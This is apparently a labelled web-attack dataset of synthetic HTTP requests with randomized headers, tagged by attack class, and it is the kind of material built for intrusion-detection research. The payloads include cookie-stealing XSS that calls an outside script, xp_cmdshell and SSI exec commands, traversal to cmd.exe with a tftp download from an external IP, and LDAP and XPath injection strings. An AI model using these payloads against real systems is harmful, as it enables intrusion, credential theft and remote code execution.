GET /yrnYyZ3X5iK6/dsi2rsdIshlrfcuRER7/HevalfJQmandWJunionfy/t4.jpeg?pNexecWYXAposition8hnull=%3Cimg++++src++++%3D+++%22livescript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.olet.com%2Fcgi-bin%2Flias.cgi%27%2Bdocument.cookie%29%3B%5D++++%22++++%3E&hr7htw=06424901&i1iriie7qhz=i HTTP/1.1
Host: 105.145.245.208
Connection: i8nttlH
Accept: text/*;q=0.4
Accept-Charset: x-mac-ce, x-mac-chinesesimp, iso-8859-15;q=0.1
Accept-Encoding: 
Accept-Language: d9nna-0taig, st2ip-tEeggnot, tnRpoe-ngigi3, nra4irr0-ucC
Cache-Control: max-stale
Client-ip: 106.65.144.196
Cookie: dmMs4=ydrophduTsylts1\g;iieItinrdtohds=sene;lM=615410;ssigotaocae9=naa
Cookie2: $Version="540"
Date: Thu, 07 Apr 05 06:47:57 GMT
ETag: W/"OurwtpibD7A0noXC"
Expect: 100-continue
From: easla@ssNseiT.it
If-Modified-Since: Sat, 07 Jun 08 19:03:11 GMT
If-Unmodified-Since: Tue, 09 Feb 10 09:33:36 GMT
If-Match: "Hhh@qIhf8nia.DsVqUWI"
If-None-Match: "m1JK9pR8yar7L562uPv8"
If-Range: Sun, 05 Apr 09 17:10:34 CET
Max-Forwards: 672
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: ae9de sesszy=lt9eEk7
Authorization: Basic c29MVFRUczE6YTdybWM=
Range: 44-,80-
Referer: /t8opo4/euanfoo/1stt/LsEimis/RIitq.gz
TE: deflate,chunked,trailers
Trailer: TE
User-Agent: Mozilla/1.3 (Machintosh; U; Mac OS X 7.4; ha-mh; rv:8.1.9) Gecko/26121363
UA-CPU: MIPS
UA-Disp: 162,931,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 931x0551
Via: HTTP/5.8 www.Bjtkamn.css
Transfer-Encoding: identity
Upgrade: liEh/2.4, ahen5/4.1
Warning: 325 www.lmdi.jpg "lP9i9" 
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 9590934365378
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47830
Start - Id: 41882
class: SqlInjection
GET /n63StJ/2bWJ7ZRsnstyle/haSFWHMNRkUY/54despi/sYPSecSEEz/nUKDZwqhzgrEyLOc@hRm/1ee1raemsoadidzr/rot/c6B_Y0EAlLNu/l18GwUYQI7hLSxmD88/epPGmKB1EExjmHTk@..htm?3fgx=ctoz&nutss=mhetshsgaefpdjz4y&eiszAatlf=27&cP8R8nPy=t4JZu8lk&kea=rAT1_l&de=nu%26%27%5Csosen%28&zihrM=3352&vinitlzni0l=omqh&2y-P2=635137&ZexecEkz=Tweai2msws&tshJkotSuRsS=allatmc%3EyEvsock_streamnXT&be=863699&tnyothyeTia=faputLe%273nn&hTr=%27+AND++++USER_NAME%28%29%3D%27coe HTTP/1.1
Host: 96.227.29.89
Connection: heIhItm
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.7
Accept-Encoding: 
Accept-Language: 2fApo-bj3daar, leaiJ-qiiia4r
Cache-Control: aeth='hdtrsab'
Client-ip: 203.18.145.66
Cookie: linenoLiim=7l;Qto=emFeRDXz2VEW;96GDehlayenlnqv=me9ariaulo1;geErnH3esao=iYFcdF;ioMRD4w0KZ=86654;tithoidt=where ]it0nrwl:
Cookie2: $Version="03"
Date: Thu, 03 Nov 05 09:27:14 UTC
ETag: W/"yKcgygKPCwRoQ3lbkIJ"
Expect: irbS
From: elee@hieitj.de
If-Modified-Since: Tue, 31 May 05 05:38:45 GMT
If-Unmodified-Since: Sat, 31 Jan 09 24:28:01 UTC
If-Match: "RZ9aaCGbXnEqbBLPfN2"
If-None-Match: *
If-Range: Wed, 28 Mar 07 21:36:14 GMT
Max-Forwards: 1357
MIME-Version: 0.4
Pragma: y='er5'
Proxy-Authorization: Digest uri=http://www.8ios34Ss.be/GyNmnu/hNIaa/tnui75/Ns1n8sf/efisp.php3
Authorization: ubi2I aprmbn=DoueHne
Range: 2764-93323,17883-91
Referer: http://www.nmQt.de/ptQbji/p2ahe.css
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: nhas3da (sDu2nCHi.n; r8tsgl; 3KKfibl2aA; byZh2X; erw-DO)
UA-CPU: StrongARM
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 044x365
Via: eg7Jdi/7.9 79.217.251.234:0, FTP/9.4 www.rtsee.htm:898
Transfer-Encoding: deflate
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 181 www.e4hach.tiff:99487 "eyten3eElsgEginsaoi" "Sun, 29 Feb 04 08:39:55 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41882
Start - Id: 41081
class: SqlInjection
GET /mgc79O@i/Hehu/eIca_cMz3n/7b/3eylaoyhairtnhtenuG/tQF-vTGUxFzqd.kzfdr.htm?tJharfoton=peoizn9e&au3rbase2E=tr%5De&ptlserriqsg=713095&srer=exec+++xp_cmdshell+%27%22F5h%22+%3E%3E++++script.vbs%27 HTTP/1.0
Host: www.ah9h.cz
Connection: LIeree
Accept: */*
Accept-Charset: iso-2022-kr, windows-1251;q=0.6, iso-2022-kr;q=0.6, x-mac-turkish;q=0.0, x-mac-greek;q=0.1
Accept-Encoding: 
Accept-Language: eraxo5r3-qtcP6pe, qh-nrXnde, myaal-r;q=0.2, 39g-h
Cache-Control: only-if-cached
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="633"
Date: Fri, 16 Jun 06 06:02:32 GMT
ETag: "Xg@@-_KEAdcBHV47NM"
Expect: todx=mj6wd7;rmdo
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Fri, 05 Nov 04 18:58:00 GMT
If-Unmodified-Since: Mon, 16 Jan 06 13:54:23 UTC
If-Match: "tHW-C8o-m99bI8N"
If-None-Match: "aRXBru0w8uSbkRYDvhx"
If-Range: Wed, 18 Nov 09 08:08:09 GMT
Max-Forwards: 3
MIME-Version: 7.6
Pragma: oltcia='goBi'
Proxy-Authorization: Digest username="seeg"
Authorization: Basic ZWVkbkg6dnNyYTliZDc=
Range: 000-,-068966
Referer: http://www.ede04igb.de/iariee4m.css
TE: trailers,chunked;q=0.1
Trailer: From
User-Agent: duugtj0o7i
UA-CPU: Sparc
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: HTTP/5.1 www.nHxnaz.jpg:262
Transfer-Encoding: compress
Upgrade: Nb5/4.4, 2oss/0.9, ienmha/5.2, paie/0.1, sMat/4.9
Warning: 604 www.hKNbdI.gif "crapaattI" "Thu, 10 Jun 04 12:26:14 UTC"
X-Forwarded-For: 110.167.165.101
X-Serial-Number: 54708069609443708
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41081
Start - Id: 37453
class: LdapInjection
GET /e7BmnOWxDf1RZrn_Wi09/wcsa@dIF4Ibbm@S.css?fgdS00=eEihn&daehpts=8&atiAdobao=eatwalsnordW&v5daa=15193&ornto=dselecteptunescs&otat0rt=a&629ca=cselecta&Tq=9&0ogbsfcmseHod=87&yrtt2iensth=tWUjMd_fLAHJ&odgid1eltoy=cfyTBRF3TxZ&aaa=36506189&odohipinIes=8158843&kgdeNJad53s=%2Btcio%28+ri HTTP/1.1
Host: www.p1nsEi.cz
Connection: r2Ev0
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: 4se=oxGN
Client-ip: 77.244.101.14
Cookie: uAyLvSR=window.open8t6Rs:p4gSatmpexec;7lethatacs9mj=) (| (displayName=had*)  (name   =  had*    )(    mail=had* );hge6=g;gUdro7i5adthei4=mnn;ddsoxh=eNzi
Cookie2: $Version="16"
Date: Mon, 12 Apr 04 05:32:21 CET
ETag: "jkTUJPFiI2zGOm7"
Expect: enaittw=mxg0
From: cdnol@lztd.biz
If-Modified-Since: Fri, 27 Mar 09 02:09:13 UTC
If-Unmodified-Since: Wed, 12 Jan 05 03:16:16 GMT
If-Match: "3vfqqCKQVWyg7Z_3h"
If-None-Match: "lsAjVBtinwowLN.Q1S3c"
If-Range: "JH7gQ6SlirKZ4@EO"
Max-Forwards: 7
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM ZXMxZTV5ZGRpcWhpd295bmhsYXdUZXJlcmFlcDllbmhsU2F0MzJsY3NsaQ==
Authorization: a6uoe undis=ieoyer7c
Range: -85,-288767
Referer: /9aoi/iybski.mpg
TE: trailers,deflate;q=0.1
Trailer: Connection
User-Agent: Mozilla/4.6 (compatible; oudbd; Win 9x; adb0hjdo; oh5n; iGnw5)
UA-CPU: MIPS
UA-Disp: 900,9901,16
UA-Pixels: 161x1713
Via: 4.1 www.blydEesu.png:18747, 8.8 166.163.78.82
Transfer-Encoding: deflate
Upgrade: oaoaii/1.1
Warning: 096 174.39.85.65 "dibesnanterur8nmCi" "Tue, 31 Jul 07 06:05:07 CET"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37453
Start - Id: 40249
class: SSI
PUT /vesexxaioordpmnnum/mEn158ZjtvbVwa@Y.msf? HTTP/1.1
Content-Length: 293
Content-Language: 0wtvo
Content-Encoding: gzip
Content-Location: http://eokbe1.biz/allEx.swf
Content-MD5: YWlib25maWNlZG9lbnNuYQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 06 Sep 05 05:10:43 UTC
Host: www.mHRme.ch:80
Connection: close
Accept: image/gif, video/*;q=0.4, application/*;q=0.1
Accept-Charset: windows-1257, iso-2022-kr;q=0.7, windows-874, ks_c_5601-1987;q=0.2
Accept-Encoding: identity;q=0.9, identity, gzip, identity;q=0.2
Accept-Language: *;q=0.2
Cache-Control: max-age=1
Client-ip: 209.173.103.43
Date: Mon, 05 Sep 05 01:35:03 CET
ETag: W/"Elsc.@Ma@beA1M38is"
Expect: 4tksenn1=dexsrl4s;caevs=w60etc
From: YHtcdN@wRae.uk
If-Modified-Since: Tue, 24 Aug 04 02:25:28 UTC
If-Unmodified-Since: Thu, 24 Mar 05 01:21:12 GMT
If-Match: *
If-Range: "YpKTyoxuyfSrntn_t"
Max-Forwards: 655
Pragma: no-cache
Proxy-Authorization: Basic b3FoYW56ems6OTdpbG8=
Authorization: NTLM MnJtUzd5ZUlpYnVrMGRjYW1hc1JvT2VlZXBvb25tdGlpZHJhdA==
Referer: /anm4e/e0dn/t9cxfrjN/eFe9tet0.php4
TE: trailers
User-Agent: i6Nheot/2.9
UA-Disp: 0036,0245,32
Via: 4.7 219.77.227.30
Transfer-Encoding: compress
----: --------------------

28xH2=rHktnw|l\w v4?t&erQwtheiita=oa&ndtosIetlek4hne=mid$2isM wr%p;&mttaw4Idt7=2551&ehl=eotn&w9j=stHOeu6pro&tiA=<!--    #exec cmd="c:\progra~1\otltzyc\iwauanc\sptdis6T.exe  d:\D9tctyo\www.line.org\6dgSjltsel\database.mdb /x  exporttofoxpro"-->

End - Id: 40249
Start - Id: 46494
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.0
Host: www.tzzihys.org:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=03280
Client-ip: 219.134.80.54
Cookie: at4a=93;0-esystem-vkincludeC=239;h3uneiOrir=H-%
Cookie2: $Version="5"
Date: Sun, 13 Sep 09 10:31:30 GMT
ETag: "XgEaHknSpO0avcsEQ"
Expect: 5rctCi08
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Wed, 13 Jun 07 03:47:29 CET
If-Match: "3mUtbnnwRNvnNHdHBy"
If-None-Match: "W5fHifN204xHZvD_Cooi"
If-Range: "-j9OI@AIkxXhBo86PRq"
Max-Forwards: 0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM ZWxlZEF5Z2hMcGVyb2VobGVlcnd1bmpVMm5kZThvYU5yZWVUcm5vZW53ZUhz
Range: 0-48
Referer: /toTti3p.nsf
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: u5e2ae/9.9.8
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: 7.7 www.uhNaionI.jpeg, voTe/3.7 www.nsrxmsle.tiff:4, smq/4.1 246.93.48.4
Transfer-Encoding: otsn; troe=con6a
Upgrade: us6nre/1.5
Warning: 000 30.27.133.227 "nEecyFef" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 46494
Start - Id: 43811
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.OdvYtunhk3.fr:80
Connection: keep-alive
Accept: video/*, application/*, video/mpeg
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=918
Client-ip: 117.85.13.55
Cookie: tjiE=execun?Pssh lechild;Yxf-9=cu2toaEnd;iedtdma=wyDoe
Cookie2: $Version="9"
Date: Thu, 18 Sep 08 10:26:50 CET
ETag: W/"ZWarviPtT3Lux5IR2"
Expect: trty=ewnjetuk;ec4Oaae=mthnicad
From: uZkpt@nesht4Iih.ch
If-Modified-Since: Mon, 04 Jan 10 02:16:34 CET
If-Unmodified-Since: Sun, 19 Nov 06 05:12:38 CET
If-Match: *
If-None-Match: "coV8IVwYjBxRDjgA"
If-Range: Tue, 06 Apr 04 13:52:08 GMT
Max-Forwards: 901
MIME-Version: 0.3
Pragma: owc=tGertwoh
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: ohtI Fgiueot=04Bshd
Range: 904036-,02113-35,44499-
Referer: /f7fnI/hmPdIh8/bnst7u/5nuj/iycevtrq.fgf
TE: deflate;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/5.7 (X11; U; Linux i386 0.2; tt-lc; rv:9.1.2) Gecko/98962144
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 057x9927
Via: FTP/2.5 134.172.198.1
Transfer-Encoding: otoh7
Upgrade: ren9do/0.2, 2ieds/4.2, a63ht/7.8, ezecpO/2.9
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43811
Start - Id: 43879
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.1
Host: www.g2pcoavoi.de:80
Connection: emne
Accept: */*;q=0.1
Accept-Charset: iso-10646-ucs-2, shift_jis, x-mac-japanese;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: min-fresh=375
Client-ip: 184.162.182.17
Cookie: UiaE0dN8TDm=7gihadmineotmpo
Cookie2: $Version="4"
Date: Fri, 02 Feb 07 23:52:33 CET
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: etc4ouNl=anmics2L
From: 2bgyahe@ty1w.biz
If-Modified-Since: Tue, 26 Feb 08 10:41:07 UTC
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: "KiU7@bvDPHIT1YhJLI"
If-None-Match: "o80Br3oYw_Toit0ij@"
If-Range: Thu, 17 Jan 08 19:30:39 CET
Max-Forwards: 3192
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: Basic dkVhczg6c2V0cG9laHA=
Range: 40517-,9-9675
Referer: /oIeei.html
TE: gzip;q=0.3
Trailer: Accept-Language
User-Agent: htelmro/0.1.9.0
UA-CPU: Sparc
UA-Disp: 708,9864,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/4.6 www.Euuyn.tiff, hgtot5/2.0 31.213.183.2, agmfan/5.2 136.43.101.187
Transfer-Encoding: deflate
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 271 www.odeL.tiff "cuhEDNroai" 
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 983467996985112
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43879
Start - Id: 39950
class: SSI
GET /0window.openVdkFc4Or8G/NL7/LasittasreH2ylYcsHlp/oji99oshlhTna9/vh/kQPjK/Et9sL28TWc5t/frWONS.fRIWTD-8l3f/w0CsyGkU4e/rh/dpHfneb5eibjmIno0q/njzjODOXpdwh.html?9onf3ttewypiier=trhtrylioieaatrrmh&oLl7nrorlttqee=%3C%21+%23%3C%21--++%23exec++++cmd%3D%22id%22--%3E&Zt8nc_r=Hadmin&NZd6wam7wwhereen=tt4hrpwindow.opennetcatlcfe&tffiaecal=eaioe&naeowrtoi=128301&It=aa&ytygtbe=vy7s HTTP/1.1
Host: 155.232.105.144
Connection: ethcuO
Accept: video/mpeg, text/html;q=0.0, text/*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 185.200.165.200
Cookie: rndIibdTrs=l=7
Cookie2: $Version="983"
Date: Sun, 12 Aug 07 05:33:01 GMT
ETag: "PS29fi3gmBioRy@5j4kl"
If-Unmodified-Since: Tue, 19 Sep 06 21:02:13 GMT
If-Range: *
Pragma: saoro5=tet
Proxy-Authorization: Digest response="ac4BeDAbEcd7D693f5c14DA2968662dc"
Authorization: NTLM M2pRZXhzc3BvbWphYXIxb25ncXZyODFkaGR0M3lkaW5wbGU=
Referer: /tOag9/atoloe/otrEs/bcoi.jsp
TE: gzip,chunked;q=0.1,chunked;q=0.0
User-Agent: RtnD/8.8.2.5
Warning: 823 178.216.83.192 "Eiiayqjoilesatoelh" 
X-Serial-Number: 99056376178916398
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39950
Start - Id: 37382
class: LdapInjection
GET /jgo/autoexecTI/4telnetC_AmT5WWxwr/t7ADG7pMfkLa16/ta/fe3rMeaa04lcap/pe/7Vw.mdb?cbsV0a=u&K2Vnph-7Ms=d3r%5DniscriptOc&ifeuMTenaab=nicd%2Fi&rtoapheprseA=72285&htmpMndjw4I3=4160171&GeeaLeetototw=178960&asCto=NaystmpO3&tdesrwutes=cah HTTP/1.1
Host: 246.51.22.168
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-874, iso-8859-2;q=0.5, iso-8859-3
Accept-Encoding: )   (| (fsis=aN9xd*)
Accept-Language: u-ottieoOt;q=0.4, azlDlj-a5ni4o;q=0.7, epe3t-o2ya;q=0.4, wn2sb-teneh8s;q=0.9, moibghad-2eh;q=0.2
Cache-Control: o='naux'
Client-ip: 6.207.230.77
Cookie: NhGDcobjectFl9=dhby;ksa0snihto0i=ctpM0lseee6bhe;xqxDSWN=sneeeettgmun;3stii5nrtesnhmi=fiframe ;eb4r0ayril2c=Oeowinnts
Cookie2: $Version="87"
Date: Wed, 08 Jun 05 10:22:42 CET
ETag: W/"C8bvM3CyILQe0CHkK"
Expect: 100-continue
From: dbhtn@kidta.ch
If-Modified-Since: Sat, 21 May 05 12:39:18 UTC
If-Unmodified-Since: Fri, 12 Aug 05 15:51:48 UTC
If-Match: "feF-OPAkIbsWMTB1v"
If-None-Match: "4GRk6t7wT_iqMz6"
If-Range: Sun, 13 May 07 19:31:05 CET
Max-Forwards: 54
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: n7te1l piFs=eoleIi1
Authorization: Digest cnonce="imac"
Range: 059445-,841-
Referer: http://www.sh7ieteH.fr/ibehks/tgqwb/ahe6Ly.dll
TE: gzip;q=0.1,trailers,trailers
Trailer: Range
User-Agent: Mozilla/2.3 (compatible; tttnIsmo; Linux i586; guEh; 6ynu)
UA-OS: Windows 95
UA-Pixels: 040x3163
Via: 0.1 85.247.181.13, 0.6 www.aehi.html, 9.9 4.206.37.196
Transfer-Encoding: deflate
Upgrade: rYmis/4.7
Warning: 557 53.236.155.130 "jldgqstdtirts" "Fri, 23 Jun 06 24:53:15 CET"
X-Forwarded-For: 52.119.164.154
X-Serial-Number: 71830
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37382
Start - Id: 40487
class: SSI
GET /wlexU5degmbxEamnted/aN%u/LUCEoV3vCku-varQ/vcMwTeTn54rKkO/uZfpVDvbXAlsMRtWuY/beos7P/rxwg/amg.php4?3eeel=ensngRLtadnoCNT&eotc7cahet5soE=40388058&nnoou7zyLlwg=eao&qDh=aol5esa&n2=%3C%21--++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&ngeoafRds=oune0yd4eesqfce&soa7hOr7Iemnt3n=IaR&N0ei=uS5M%40v_7PUC&7ebansl7atla=fothnniwkcehro7&tdjtl4=at9i&5wVEB2K=luoN%3Bmeepasswdtlno9servicesmii&VLZqIGll0a.k=homen&hwhdss1q=9&-zDFsWf9iH=71&aco=89261322 HTTP/1.1
Host: www.advetdrsa.com
Connection: keep-alive
Accept: audio/basic, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e-hymuo
Cache-Control: min-fresh=70
Client-ip: 178.48.213.72
Cookie: Z-YP-q=2;cd21kuo0fPRnmn=ebn2gsecOypaoshea;htrtbilmd= n edtus:SxmllTlEyaz&r;tiTtr=position p6l;enmesdfa=0532442639;eisyuxtoelkds=i
Cookie2: $Version="027"
Date: Sat, 11 Jul 09 05:44:41 UTC
ETag: "a.QN3Ry4VSFG10B9J-h"
Expect: f1jsa=ntt7oem
From: Meara5ka@omiicnkiy.st
If-Modified-Since: Thu, 27 Oct 05 04:28:34 CET
If-Unmodified-Since: Thu, 06 Jul 06 22:10:49 CET
If-Match: "9UuyQOu4-ojSsHh02mI7"
If-None-Match: *
If-Range: Fri, 20 Jan 06 16:37:37 UTC
Max-Forwards: 33
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: rstLs avvoe=hvtuI
Range: 120-,-29
Referer: /3gEa/wedt.sh
TE: gzip,gzip;q=0.3,trailers
Trailer: Warning
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 2.5; eo-he; rv:1.3.1) Gecko/59802401
UA-CPU: Sparc
UA-Disp: 609,4490,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0287x026
Via: 2.3 208.108.86.29, HTTP/3.0 114.118.211.239
Transfer-Encoding: snvo; ehmnkehc=9nbdese
Upgrade: ts54/2.4, d9bEte/1.6, rdsh/2.9
Warning: 801 69.96.230.25 "gie9i8edctt4ENs" "Tue, 27 Jan 04 19:25:43 UTC"
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 55598980904343059452
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 40487
Start - Id: 45465
class: PathTransversal
GET /otqtef4naooeCtn0toh/92WLwP/epkBxk/7-5cv_4SJX/vzQmLNaohYaBcb3.gif?pFriSieO4asirh=t%3A%5Cautoexec.bat&idawnRaeh1m=63175557&swo=9719&tbuiihPeii=documentaTi0eIto&BconnectUX3cNYVo=l%5CreS&iiaebbtXanit=19586&fSaOprdibniwqk=egae8ekxtsol HTTP/1.0
Host: 244.151.229.127
Connection: close
Accept: application/zip;q=0.4
Accept-Charset: x-mac-arabic, utf-8;q=0.9, x-mac-arabic;q=0.6, windows-1253;q=0.1, koi8-r
Accept-Encoding: 
Accept-Language: meuatwR-sai;q=0.0, eaugh-D, Xa3snwh-puoygsh;q=0.9, gn4tnw-c;q=0.1, mlsrh-eddSeeu;q=0.8
Cache-Control: ne6e='hthef'
Client-ip: 104.75.30.146
Cookie: hFfinsert=6513;8eedpe=68381;AbsgpLpe=wIp5whwWientstdingf;5sean4eum2o=06;n9WdOHRr8=40775
Cookie2: $Version="91"
Date: Wed, 26 Jan 05 21:22:50 CET
ETag: "MWQpBPOD6G9PQ6YY5D"
Expect: 100-continue
From: eso4Aae@o0ky0.it
If-Modified-Since: Tue, 16 Sep 08 10:32:29 CET
If-Unmodified-Since: Mon, 16 Nov 09 13:43:56 UTC
If-Match: *
If-None-Match: "pA22N6.sbscK898"
If-Range: "tUgWF8Y-xOGVIERHN-"
Max-Forwards: 157
Pragma: nnc=a
Proxy-Authorization: Digest algorithm=ohi4
Authorization: ianw cFnsazM=HpFt
Range: -23,7962-,63876-540949
Referer: http://saemdeo.de/ctuseote/isr10L/ue9Iel/E2sm/eHdqtyr0.tar
TE: trailers,chunked
Trailer: Proxy-Authorization
User-Agent: 8ho5a/1.4.5
UA-CPU: Sparc
UA-Disp: 1778,2316,8
UA-OS: Win98
UA-Color: color8
Via: 09qO/9.5 211.128.59.21:72, 1ndlst/2.9 www.gja9h.shtml, 9.4 14.157.145.218
Transfer-Encoding: 5lin
Upgrade: drf/1.3, eoe/9.9
Warning: 043 www.ncs3tn.jpeg "EienkeoUSsat5" 
X-Forwarded-For: 93.18.219.115
X-Serial-Number: 347804024892974921
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45465
Start - Id: 44944
class: PathTransversal
GET /gtcxaS/drc8li/cvbNoRVW6c/naIDXVO4iSHY/6oiirohtsee/oeaoovTo.jpeg?8L.O9-L=doc%28+file%3A%2F%2F%2Fc%3A%2FocAy7%2Fue3ezofz.xml+%29&jOupDchildLXK=sthitdo4OcbsuaniX&oeetw=fQetc&staeudla3soenua=mto HTTP/1.0
Host: www.hwoO9ol.ch:939
Connection: mquecMe5
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=96016
Client-ip: 3.199.126.43
Cookie: fotThYlbs=o9otySnW;sexrBwjtOciN=childitdyF;inhxmara=Tota;e4ElpaRn=90492
Cookie2: $Version="755"
Date: Thu, 01 Jun 06 04:49:35 CET
ETag: "qpSEFGWwvh_mqnErhygU"
Expect: 100-continue
From: idto@ug5qpuenx6.org
If-Modified-Since: Sat, 19 Jan 08 16:02:52 UTC
If-Unmodified-Since: Tue, 15 May 07 22:12:25 GMT
If-Match: *
If-None-Match: "1z7E2N9Lg@uLveYI"
If-Range: Thu, 03 Jul 08 10:20:20 CET
Max-Forwards: 9584
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest response="cFbf2F57cDDF4E7Ed19bE92BCEa0ec12"
Authorization: NTLM ZWhGbzJqVnNsZWxub2VpbGJodG5pZXNjaTVkYXRvM3RyaGU=
Range: 032407-30
Referer: http://aTujtq.gov/Ahagtm.gz
TE: deflate
Trailer: Referer
User-Agent: Mozilla/6.6 (Windows; U; Windows NT 6.7; ro-ws; rv:6.0.4) Gecko/24469925
UA-CPU: StrongARM
UA-Disp: 8355,9239,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2762x370
Via: HTTP/3.9 5.50.89.38
Transfer-Encoding: compress
Upgrade: nhT/6.7
Warning: 151 7.22.89.225 "tqonsaseaLehs" "Fri, 02 Feb 07 23:07:17 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44944
Start - Id: 35650
class: XPathInjection
GET /scte9trts8a3aers/redul-@L38o/eV_e/oVNC/weLnysotgdviene/jlCsU/egtelnecavEt/t1snkfzeoa9ctEvtr/uVQh1MEOPOGJX/esioOrasetsoee.bin?a9odo5shs=e&stevgrnwTey5xot=tbpoddqEt&bcpUmU6CdC=tqhttpstt%2Fhe%7E5dbe%3B&documentFUPA=sropen&Bk0dm=Atu%27++++or+++++6++++%3C+++++count%28path%2Fchild%3A%3A*%29+++or+++%27eesfle%27++++%3D+++%27&heTGm7m1glmE=v5t94yaia&4dxyndwtei=r HTTP/1.1
Host: 6.221.137.222
Connection: lg9h5nrl
Accept: */*
Accept-Charset: windows-1250;q=0.9
Accept-Encoding: identity;q=0.1, deflate
Accept-Language: anch-ymecqas, n-yWjne;q=0.6, nhneca-a2TadEn;q=0.1, sye-2, sis-sanWe
Cache-Control: min-fresh=5
Client-ip: 85.216.49.129
Cookie: 5EaSreZ1eeyls=ad;6iItebr=16641;ea8h69neOr=EnIiga?ibe;e0UUJ6b=m7tetgroup byp|:wtmp|tme e;uioGtaituHgsca=cEW_D
Cookie2: $Version="053"
Date: Wed, 16 Apr 08 24:07:36 UTC
ETag: W/"VjI4D31SEFBo-376Rgs"
Expect: ye2S
From: 8oiisi@uknxnhisdr.org
If-Modified-Since: Thu, 06 Oct 05 14:17:44 CET
If-Unmodified-Since: Fri, 19 Mar 10 18:02:26 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: Digest cnonce="hocliaa"
